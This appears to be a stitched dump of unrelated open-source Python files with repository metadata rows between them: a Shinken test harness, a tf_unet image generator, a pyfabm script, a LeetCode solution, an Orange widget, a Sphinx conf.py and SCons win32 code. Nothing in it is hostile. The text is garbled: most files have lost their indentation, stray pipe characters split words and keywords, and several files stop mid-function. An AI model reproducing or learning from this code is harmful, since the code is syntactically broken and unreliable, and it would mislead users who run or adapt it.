# Silence logging during the test run: route log broks to the dummy sink
# and only surface ERROR-level messages.
logger.load_obj(__DUMMY())
logger.setLevel(ERROR)
# We overwrite the functions time() and sleep()
# This way we can modify sleep() so that it immediately returns although
# for a following time() it looks like thee was actually a delay.
# This massively speeds up the tests.
class TimeHacker(object):
    """Fakes the passage of time for the test suite.

    After set_my_time(), time.sleep() merely advances an internal offset
    that time.time() adds on top of the real clock, so tests that wait
    complete instantly while still observing elapsed time.
    """

    def __init__(self):
        # Keep handles on the genuine functions so they can be restored.
        self.original_time_time = time.time
        self.original_time_sleep = time.sleep
        self.my_oldtime = time.time
        self.my_starttime = time.time()
        self.my_offset = 0
        self.in_real_time = True

    def my_time_time(self):
        # Real clock plus however long we pretended to sleep.
        return self.my_oldtime() + self.my_offset

    def my_time_sleep(self, delay):
        # Don't actually sleep; just remember that we "did".
        self.my_offset += delay

    def time_warp(self, duration):
        # Jump the fake clock forward without a sleep() call.
        self.my_offset += duration

    def set_my_time(self):
        if not self.in_real_time:
            return
        time.time = self.my_time_time
        time.sleep = self.my_time_sleep
        self.in_real_time = False

    # If external processes or time stamps for files are involved, we must
    # revert the fake timing routines, because these externals cannot be
    # fooled: they get their times from the operating system.
    def set_real_time(self):
        if self.in_real_time:
            return
        time.time = self.original_time_time
        time.sleep = self.original_time_sleep
        self.in_real_time = True
# Time hacking for every test: install the fake clock at import time so
# all test cases run with instant sleeps by default.
time_hacker = TimeHacker()
time_hacker.set_my_time()
class Pluginconf(object):
    # Bare attribute container; test code assigns arbitrary attributes
    # on instances to fake plugin/module configuration objects.
    pass
class _Unittest2CompatMixIn:
    """
    Mixin for simulating methods new in unittest2 resp. Python 2.7.

    Every test-case should inherit this *after* unittest.TestCase to
    make the compatibility-methods available if they are not defined in
    unittest.TestCase already. Example::

        class MyTestCase(unittest.TestCase, Unittest2CompatMixIn):
            ...

    In our case, it's better to always inherit from ShinkenTest
    """
    # Fix: the optional msg argument was accepted but silently dropped;
    # it is now forwarded to assertTrue so failure messages show up.
    def assertNotIn(self, member, container, msg=None):
        self.assertTrue(member not in container, msg)

    def assertIn(self, member, container, msg=None):
        self.assertTrue(member in container, msg)

    def assertIsInstance(self, obj, cls, msg=None):
        self.assertTrue(isinstance(obj, cls), msg)

    def assertRegexpMatches(self, line, pattern):
        r = re.search(pattern, line)
        self.assertTrue(r is not None)

    def assertIs(self, obj, cmp, msg=None):
        self.assertTrue(obj is cmp, msg)
class ShinkenTest(unittest.TestCase, _Unittest2CompatMixIn):
    def setUp(self):
        # Default fixture: a minimal 1-realm / 1-host / 1-service config.
        self.setup_with_file('etc/shinken_1r_1h_1s.cfg')
def setup_with_file(self, path):
time_hacker.set_my_time()
self.print_header()
# i am arbiter-like
self.broks = {}
self.me = None
self.log = logger
self.log.load_obj(self)
self.config_files = [path]
self.conf = Config()
buf = self.conf.read_config(self.config_files)
raw_objects = self.conf.read_config_buf(buf)
self.conf.create_objects_for_type(raw_objects, 'arbiter')
self.conf.create_objects_for_type(raw_objects, 'module')
self.conf.early_arbiter_linking()
self.conf.create_objects(raw_objects)
self.conf.old_properties_names_to_new()
self.conf.instance_id = 0
self.conf.instance_name = 'test'
# Hack push_flavor, that is set by the dispatcher
self.conf.push_flavor = 0
self.conf.load_triggers()
self.conf.linkify_templates()
self.conf.apply_inheritance()
self.conf.explode()
#print "Aconf.services has %d elements" % len(self.conf.services)
self.conf.create_reversed_list()
self.conf.remove_twins()
self.conf.apply_implicit_inheritance()
self.conf.fill_default()
self.conf.remove_templates()
self.conf.compute_hash()
#print "conf.services has %d elements" % len(self.conf.services)
self.conf.create_reversed_list()
self.conf.override_properties()
self.conf.pythonize()
count = self.conf.remove_exclusions()
if count > 0:
self.conf.create_reversed_list()
self.conf.linkify()
self.conf.apply_dependencies()
self.conf.explode_global_conf()
self.conf.propagate_timezone_option()
self.conf.create_business_rules()
self.conf.create_business_rules_dependencies()
self.conf.is_correct()
if not self.conf.conf_is_correct:
print "The conf is not correct, I stop here"
return
self.conf.clean()
self.confs = self.conf.cut_into_parts()
self.conf.prepare_for_sending()
self.conf.show_errors()
self.dispatcher = Dispatcher(self.conf, self.me)
scheddaemon = Shinken(None, False, False, False, None, None)
self.sched = Scheduler(scheddaemon)
scheddaemon.sched = self.sched
scheddaemon.modules_dir = modules_dir
scheddaemon.load_modules_manager()
# Remember to clean the logs we just created before launching tests
self.clear_logs()
m = MacroResolver()
m.init(self.conf)
self.sched.load_conf(self.conf, in_test=True)
e = ExternalCommandManager(self.conf, 'applyer')
self.sched.external_command = e
e.load_scheduler(self.sched)
e2 = ExternalCommandManager(self.conf, 'dispatcher')
e2.load_arbiter(self)
self.external_command_dispatcher = e2
self.sched.conf.accept_passive_unknown_check_results = False
self.sched.schedule()
def add(self, b):
if isinstance(b, Brok):
self.broks[b.id] = b
return
| if isinstance(b, ExternalCommand):
self.sched.run_external_command(b.cmd_line)
def fake_check(self, ref, exit_status, output="OK"):
#print "fake", ref
now = time.time()
ref.schedule(force=True)
# now checks are schedule and we get them in
# the action queue
#check = ref.actions.pop()
check = ref.checks_in_progress[0]
self.sched.add(check) # check is now in sched.checks[]
# Allo | ws to force check scheduling without setting its status nor
# output. Useful for manual business rules rescheduling, for instance.
if exit_status is None:
return
# fake execution
check.check_time = now
# and lie about when we will launch it because
|
mughanibu/Deep-Learning-for-Inverse-Problems | tf_unet/image_gen.py | Python | mit | 3,652 | 0.008215 | # tf_unet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# tf_unet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with tf_unet. If not, see <http://www.gnu.org/licenses/>.
'''
Toy example, generates images at random that can be used for training
Created on Jul 28, 2016
author: jakeret
'''
from __future__ import print_function, division, absolute_import, unicode_literals
import numpy as np
from tf_unet.image_util import BaseDataProvider
class GrayScaleDataProvider(BaseDataProvider):
channels = 1
n_class = 1
def __init__(self, nx, ny, **kwargs):
super(GrayScaleDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
image, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
# print(image.shape)
# print(label.shape)
return image,label
# return create_image_and_label(self.nx, self.ny, **self.kwargs)
class RgbDataProvider(BaseDataProvider):
channels = 3
n_class = 2
def __init__(self, nx, ny, **kwargs):
super(RgbDataProvider, self).__init__()
self.nx = nx
self.ny = ny
self.kwargs = kwargs
rect = kwargs.get("rectangles", False)
if rect:
self.n_class=3
def _next_data(self):
data, label = create_image_and_label(self.nx, self.ny, **self.kwargs)
return to_rgb(data), label
def create_image_and_label(nx,ny, cnt = 2, r_min = 2, r_max = 8, border = 0, sigma = 1, rectangles=False):
image = np.ones((nx, ny, 1))
label = np.zeros((nx, ny, 3), dtype=np.float32)
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt):
a = np.random.randint(border, nx-border)
b = np.random.randint(border, ny-border)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
y,x = np.ogrid[-a:nx-a, -b:ny-b]
m = x*x + y*y <= r*r
mask = np.logical_or(mask, m)
image[m] = h
# print(mask.shape)
label[mask, 1] = 1
if rectangles:
mask = np.zeros((nx, ny), dtype=np.bool)
for _ in range(cnt//2):
a = np.random.randint(nx)
b = np.random.randint(ny)
r = np.random.randint(r_min, r_max)
h = np.random.randint(1,255)
m = np.zeros((nx, ny), dtype=np.bool)
m[a:a+r, b:b+r] = True
mask = np.logical_or(mask, m)
image[m] = h
label[mask, 2] = 1
label[..., 0] = ~(np.logical_or(label[...,1], label[...,2]))
image += np.random.normal(scale=sigma, size=image.shape)
image -= np.amin(image)
image /= np.amax | (image)
if rectangles:
ret | urn image, label
else:
return image, label[..., 1]
def to_rgb(img):
img = img.reshape(img.shape[0], img.shape[1])
img[np.isnan(img)] = 0
img -= np.amin(img)
img /= np.amax(img)
blue = np.clip(4*(0.75-img), 0, 1)
red = np.clip(4*(img-0.25), 0, 1)
green= np.clip(44*np.fabs(img-0.5)-1., 0, 1)
rgb = np.stack((red, green, blue), axis=2)
return rgb
|
hofmeist/fabm-ihf | src/drivers/python/pyfabm/utils/fabm_describe_model.py | Python | gpl-2.0 | 1,910 | 0.019372 | #!/usr/bin/e | nv python
import sys
import argparse
try:
import pyfabm
except ImportError:
print 'Unable to load pyfabm. See https://github.com/fabm-model/code/wiki/python.'
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description='This script lists a | ll state variables, diagnostic variables, conserved quantities and environmental dependencies of a biogeochemical model.')
parser.add_argument('path',help='Path to a YAML file with the model configuration (typically fabm.yaml)',nargs='?',default='fabm.yaml')
args = parser.parse_args()
# Create model object from YAML file.
model = pyfabm.Model(args.path)
print 'Interior state variables:'
for variable in model.bulk_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Surface-attached state variables:'
for variable in model.surface_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Bottom-attached state variables:'
for variable in model.bottom_state_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Interior diagnostic variables:'
for variable in model.bulk_diagnostic_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Horizontal diagnostic variables:'
for variable in model.horizontal_diagnostic_variables:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
print 'Conserved quantities:'
for variable in model.conserved_quantities:
print ' %s (%s)' % (variable.name,variable.units)
print 'Dependencies:'
for variable in model.dependencies:
print ' %s = %s (%s)' % (variable.name,variable.long_name,variable.units)
if __name__ == "__main__":
# execute only if run as a script
main()
|
qiyuangong/leetcode | python/087_Scramble_String.py | Python | mit | 3,034 | 0.002966 | class Solution(object):
#https://discuss.leetcode.com/topic/20094/my-c-solutions-recursion-with-cache-dp-recursion-with-cache-and-pruning-with-explanation-4ms/2
# def isScramble(self, s1, s2):
# """
# :type s1: str
# :type s2: str
# :rtype: bool
# """
# # recursive
# if s1 == s2:
# return True
# if len(s1) != len(s2):
# return False
# ls = len(s1)
# letters = [0] * 26
# for i in range(ls):
# letters[ord(s1[i]) - ord('a')] += 1
# letters[ord(s2[i]) - ord('a')] -= 1
# for i in range(26):
# if letters[i] != 0:
# return False
# for i in range(1, ls):
# if self.isScramble(s1[0:i], s2[0:i]) and self.isScramble(s1[i:], s2[i:]):
# return True
# if self.isScramble(s1[0:i], s2[ls - i:]) and self.isScramble(s1[i:], s2[:ls - i]):
# return True
# return False
def isScramble(self, s1, s2, memo={}):
# recursive with memo
# Check with sorted is fundamental, otherwise TLE
if len(s1) != len(s2) or sorted(s1) != sorted(s2):
return False
if len(s1) <= len(s2) <= 1:
return s1 == s2
| if s1 == s2:
return True
if (s1, s2) in memo:
return memo[s1, s2]
n = len(s1)
for i in range(1, n):
a = self.isScramble(s1[:i], s2[:i], memo) and self.isScramble(s1[i:], s2[i:], memo)
if not a:
b = self.isScramble(s1[:i], s2[-i:], memo) and self.isScramble(s1[i:], s2[:-i], memo)
if a or b:
memo[s1, | s2] = True
return True
memo[s1, s2] = False
return False
# def isScramble(self, s1, s2):
# # dp TLE
# if s1 == s2:
# return True
# if len(s1) != len(s2):
# return False
# ls = len(s1)
# letters = [0] * 26
# for i in range(ls):
# letters[ord(s1[i]) - ord('a')] += 1
# letters[ord(s2[i]) - ord('a')] -= 1
# for i in range(26):
# if letters[i] != 0:
# return False
# dp = [[[False] * ls for i in range(ls)] for i in range(ls + 1)]
# for i in range(ls):
# for j in range(ls):
# dp[1][i][j] = (s1[i] == s2[j])
#
# for cur_len in range(2, ls + 1):
# for i in range(ls - cur_len + 1):
# for j in range(ls - cur_len + 1):
# dp[cur_len][i][j] = False
# for k in range(1, cur_len):
# if dp[cur_len][i][j]:
# break
# dp[cur_len][i][j] = dp[cur_len][i][j] or (dp[k][i][j] and dp[cur_len - k][i + k][j + k])
# dp[cur_len][i][j] = dp[cur_len][i][j] or (dp[k][i + cur_len - k][j] and dp[cur_len - k][i][j + k])
# return dp[ls][0][0]
|
cheral/orange3 | Orange/widgets/data/owcreateclass.py | Python | bsd-2-clause | 20,686 | 0.000242 | """Widget for creating classes from non-numeric attribute by substrings"""
import re
from itertools import count
import numpy as np
from AnyQt.QtWidgets import QGridLayout, QLabel, QLineEdit, QSizePolicy
from AnyQt.QtCore import QSize, Qt
from Orange.data import StringVariable, DiscreteVariable, Domain
from Orange.data.table import Table
from Orange.statistics.util import bincount
from Orange.preprocess.transformation import Transformation, Lookup
from Orange.widgets import gui, widget
from Orange.widgets.settings import DomainContextHandler, ContextSetting
from Orange.widgets.utils.itemmodels import DomainModel
from Orange.widgets.widget import Msg
def map_by_substring(a, patterns, case_sensitive, match_beginning):
"""
Map values in a using a list of patterns. The patterns are considered in
order of appearance.
Args:
a (np.array): input array of `dtype` `str`
patterns (list of str): list of stirngs
case_sensitive (bool): case sensitive match
match_beginning (bool): match only at the beginning of the string
Returns:
np.array of floats representing indices of matched patterns
"""
res = np.full(len(a), np.nan)
if not case_sensitive:
a = np.char.lower(a)
patterns = (pattern.lower() for pattern in patterns)
for val_idx, pattern in reversed(list(enumerate(patterns))):
indices = np.char.find(a, pattern)
matches = indices == 0 if match_beginning else indices != -1
res[matches] = val_idx
return res
class ValueFromStringSubstring(Transformation):
"""
Transformation that computes a discrete variable from a string variable by
pattern matching.
Given patterns `["abc", "a", "bc", ""]`, string data
`["abcd", "aa", "bcd", "rabc", "x"]` is transformed to values of the new
attribute with indices`[0, 1, 2, 0, 3]`.
Args:
variable (:obj:`~Orange.data.StringVariable`): the original variable
patterns (list of str): list of string patterns
case_sensitive (bool, optional): if set to `True`, the match is case
sensitive
match_beginning (bool, optional): if set to `True`, the pattern must
appear at the beginning of the string
"""
def __init__(self, variable, patterns,
case_sensitive=False, match_beginning=False):
super().__init__(variable)
self.patterns = patterns
self.case_sensitive = case_sensitive
self.match_beginning = match_beginning
def transform(self, c): |
"""
Transform the given data.
Args:
c (np.array): an array of type that can be cast to dtype `str`
Returns:
np.array of floats representing indices of matched patterns
"""
nans = np.equal(c, None)
c = c.astype(str)
c[nans] = ""
res = map_by_substring(
c, self.patterns, self.case_sensitive, self.match_beginning)
res[nans] = np.nan
return res
class ValueFromDiscre | teSubstring(Lookup):
"""
Transformation that computes a discrete variable from discrete variable by
pattern matching.
Say that the original attribute has values
`["abcd", "aa", "bcd", "rabc", "x"]`. Given patterns
`["abc", "a", "bc", ""]`, the values are mapped to the values of the new
attribute with indices`[0, 1, 2, 0, 3]`.
Args:
variable (:obj:`~Orange.data.DiscreteVariable`): the original variable
patterns (list of str): list of string patterns
case_sensitive (bool, optional): if set to `True`, the match is case
sensitive
match_beginning (bool, optional): if set to `True`, the pattern must
appear at the beginning of the string
"""
def __init__(self, variable, patterns,
case_sensitive=False, match_beginning=False):
super().__init__(variable, [])
self.case_sensitive = case_sensitive
self.match_beginning = match_beginning
self.patterns = patterns # Finally triggers computation of the lookup
def __setattr__(self, key, value):
"""__setattr__ is overloaded to recompute the lookup table when the
patterns, the original attribute or the flags change."""
super().__setattr__(key, value)
if hasattr(self, "patterns") and \
key in ("case_sensitive", "match_beginning", "patterns",
"variable"):
self.lookup_table = map_by_substring(
self.variable.values, self.patterns,
self.case_sensitive, self.match_beginning)
class OWCreateClass(widget.OWWidget):
name = "Create Class"
description = "Create class attribute from a string attribute"
icon = "icons/CreateClass.svg"
category = "Data"
keywords = ["data"]
inputs = [("Data", Table, "set_data")]
outputs = [("Data", Table)]
want_main_area = False
settingsHandler = DomainContextHandler()
attribute = ContextSetting(None)
class_name = ContextSetting("class")
rules = ContextSetting({})
match_beginning = ContextSetting(False)
case_sensitive = ContextSetting(False)
TRANSFORMERS = {StringVariable: ValueFromStringSubstring,
DiscreteVariable: ValueFromDiscreteSubstring}
class Warning(widget.OWWidget.Warning):
no_nonnumeric_vars = Msg("Data contains only numeric variables.")
def __init__(self):
super().__init__()
self.data = None
# The following lists are of the same length as self.active_rules
#: list of pairs with counts of matches for each patter when the
# patterns are applied in order and when applied on the entire set,
# disregarding the preceding patterns
self.match_counts = []
#: list of list of QLineEdit: line edit pairs for each pattern
self.line_edits = []
#: list of QPushButton: list of remove buttons
self.remove_buttons = []
#: list of list of QLabel: pairs of labels with counts
self.counts = []
combo = gui.comboBox(
self.controlArea, self, "attribute", label="From column: ",
box=True, orientation=Qt.Horizontal, callback=self.update_rules,
model=DomainModel(valid_types=(StringVariable, DiscreteVariable)))
# Don't use setSizePolicy keyword argument here: it applies to box,
# not the combo
combo.setSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)
patternbox = gui.vBox(self.controlArea, box=True)
#: QWidget: the box that contains the remove buttons, line edits and
# count labels. The lines are added and removed dynamically.
self.rules_box = rules_box = QGridLayout()
patternbox.layout().addLayout(self.rules_box)
box = gui.hBox(patternbox)
gui.button(
box, self, "+", callback=self.add_row, autoDefault=False, flat=True,
minimumSize=(QSize(20, 20)))
gui.rubber(box)
self.rules_box.setColumnMinimumWidth(1, 70)
self.rules_box.setColumnMinimumWidth(0, 10)
self.rules_box.setColumnStretch(0, 1)
self.rules_box.setColumnStretch(1, 1)
self.rules_box.setColumnStretch(2, 100)
rules_box.addWidget(QLabel("Name"), 0, 1)
rules_box.addWidget(QLabel("Substring"), 0, 2)
rules_box.addWidget(QLabel("#Instances"), 0, 3, 1, 2)
self.update_rules()
gui.lineEdit(
self.controlArea, self, "class_name",
label="Name for the new class:",
box=True, orientation=Qt.Horizontal)
optionsbox = gui.vBox(self.controlArea, box=True)
gui.checkBox(
optionsbox, self, "match_beginning", "Match only at the beginning",
callback=self.options_changed)
gui.checkBox(
optionsbox, self, "case_sensitive", "Case sensitive",
callback=self.options_changed)
layout = QGridLayout()
gui.widgetBox(self.controlArea, orientation=layout)
for i in range(3):
layout.setColumnStretch(i, 1)
layout.addWidg |
schacki/cookiecutter-django | {{cookiecutter.project_slug}}/docs/conf.py | Python | bsd-3-clause | 8,166 | 0.00147 | # -*- coding: utf-8 -*-
#
# {{ cookiecutter.project_name }} documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = '{{ cookiecutter.project_name }}'
copyright = """{% now 'utc', '%Y' %}, {{ cookiecutter.author_name }}"""
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be | used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additiona | l_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = '{{ cookiecutter.project_slug }}doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index',
'{{ cookiecutter.project_slug }}.tex',
'{{ cookiecutter.project_name }} Documentation',
"""{{ cookiecutter.author_name }}""", 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', '{{ cookiecutter.project_slug }}', '{{ cookiecutter.project_name }} Documentation',
["""{{ cookiecutter.author_name }}"""], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', '{{ cookiecutter.project_slug }}', '{{ cookiecutter.project_name }} Documentation',
"""{{ cookiecutter.author_name }}""", '{{ cookiecutter.project_name }}',
"""{{ cookiecutter.description }}""", 'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
|
bilke/OpenSG-1.8 | SConsLocal/scons-local-0.96.1/SCons/Platform/win32.py | Python | lgpl-2.1 | 13,583 | 0.006331 | """SCons.Platform.win32
Platform-specific initialization for Win32 systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "/home/scons/scons/branch.0/baseline/src/engine/SCons/Platform/win32.py 0.96.1.D001 2004/08/23 09:55:29 knight"
import os
import os.path
import string
import sys
import tempfile
from SCons.Platform.posix import exitvalmap
# XXX See note below about why importing SCons.Action should be
# eventually refactored.
import SCons.Action
import SCons.Util
class TempFileMunge:
"""A callable class. You can set an Environment variable to this,
then call it with a string argument, then it will perform temporary
file substitution on it. This is used to circumvent the win32 long command
line limitation.
Example usage:
env["TEMPFILE"] = TempFileMunge
env["LINKCOM"] = "${TEMPFILE('$LINK $TARGET $SOURCES')}"
"""
def __init__(self, cmd):
self.cmd = cmd
def __call__(self, target, source, env, for_signature):
if for_signature:
return self.cmd
cmd = env.subst_list(self.cmd, 0, target, source)[0]
try:
maxline = int(env.subst('$MAXLINELENGTH'))
except ValueError:
maxline = 2048
if (reduce(lambda x, y: x + len(y), cmd, 0) + len(cmd)) <= maxline:
return self.cmd
else:
# We do a normpath because mktemp() has what appears to be
# a bug in Win32 that will use a forward slash as a path
# delimiter. Win32's link mistakes that for a command line
# switch and barfs.
#
# We use the .lnk suffix for the benefit of the Phar Lap
# linkloc linker, which likes to append an .lnk suffix if
# none is given.
tmp = os.path.normpath(tempfile.mktemp('.lnk'))
native_tmp = SCons.Util.get_native_path(tmp)
if env['SHELL'] and env['SHELL'] == 'sh':
# The sh shell will try to escape the backslashes in the
# path, so unescape them.
native_tmp = string.replace(native_tmp, '\\', r'\\\\')
# In Cygwin, we want to use rm to delete the temporary
# file, because del does not exist in the sh shell.
rm = env.Detect('rm') or 'del'
else:
# Don't use 'rm' if the shell is not sh, because rm won't
# work with the win32 shells (cmd.exe or command.com) or
# win32 path names.
rm = 'del'
args = map(SCons.Util.quote_spaces, cmd[1:])
open(tmp, 'w').write(string.join(args, " ") + "\n")
# XXX Using the SCons.Action.print_actions value directly
# like this is bogus, but expedient. This class should
# really be rewritten as an Action that defines the
# __call__() and strfunction() methods and lets the
# normal action-execution logic handle whether or not to
# print/execute the action. The problem, though, is all
# of that is decided before we execute this method as
# part of expanding the $TEMPFILE construction variable.
# Consequently, refactoring this will have to wait until
# we get more flexible with allowing Actions to exist
# independently and get strung together arbitrarily like
# Ant tasks. In the meantime, it's going to be more
# user-friendly to not let obsession with architectural
# purity get in the way of just being helpful, so we'll
# reach into SCons.Action directly.
if SCons.Action.print_actions:
print("Using tempfile "+native_tmp+" for command line:\n"+
str(cmd[0]) + " " + string.join(args," "))
return [ cmd[0], '@' + native_tmp + '\n' + rm, native_tmp ]
# The upshot of all this is that, if you are using Python 1.5.2,
# you had better have cmd or command.com in your PATH when you run
# scons.
def piped_spawn(sh, escape, cmd, args, env, stdout, stderr):
# There is no direct way to do that in python. What we do |
# here should work for most cases:
# In case stdout (stderr) is not redirected to a file,
# we redirect it into a temporary file tmpFileStdout
# (tmpFileStderr) and copy the contents of t | his file
# to stdout (stderr) given in the argument
if not sh:
sys.stderr.write("scons: Could not find command interpreter, is it in your PATH?\n")
return 127
else:
# one temporary file for stdout and stderr
tmpFileStdout = os.path.normpath(tempfile.mktemp())
tmpFileStderr = os.path.normpath(tempfile.mktemp())
# check if output is redirected
stdoutRedirected = 0
stderrRedirected = 0
for arg in args:
# are there more possibilities to redirect stdout ?
if (string.find( arg, ">", 0, 1 ) != -1 or
string.find( arg, "1>", 0, 2 ) != -1):
stdoutRedirected = 1
# are there more possibilities to redirect stderr ?
if string.find( arg, "2>", 0, 2 ) != -1:
stderrRedirected = 1
# redirect output of non-redirected streams to our tempfiles
if stdoutRedirected == 0:
args.append(">" + str(tmpFileStdout))
if stderrRedirected == 0:
args.append("2>" + str(tmpFileStderr))
# actually do the spawn
try:
args = [sh, '/C', escape(string.join(args)) ]
ret = os.spawnve(os.P_WAIT, sh, args, env)
except OSError, e:
# catch any error
ret = exitvalmap[e[0]]
if stderr != None:
stderr.write("scons: %s: %s\n" % (cmd, e[1]))
# copy child output from tempfiles to our streams
# and do clean up stuff
if stdout != None and stdoutRedirected == 0:
try:
stdout.write(open( tmpFileStdout, "r" ).read())
os.remove( tmpFileStdout )
except (IOError, OSError):
pass
if stderr != None and stderrRedirected == 0:
try:
stderr.write(open( tmpFileStderr, "r" ).read())
os.remove( tmpFileStderr )
except (IOError, OSError):
pass
return ret
def spawn(sh, escape, cmd, args, env):
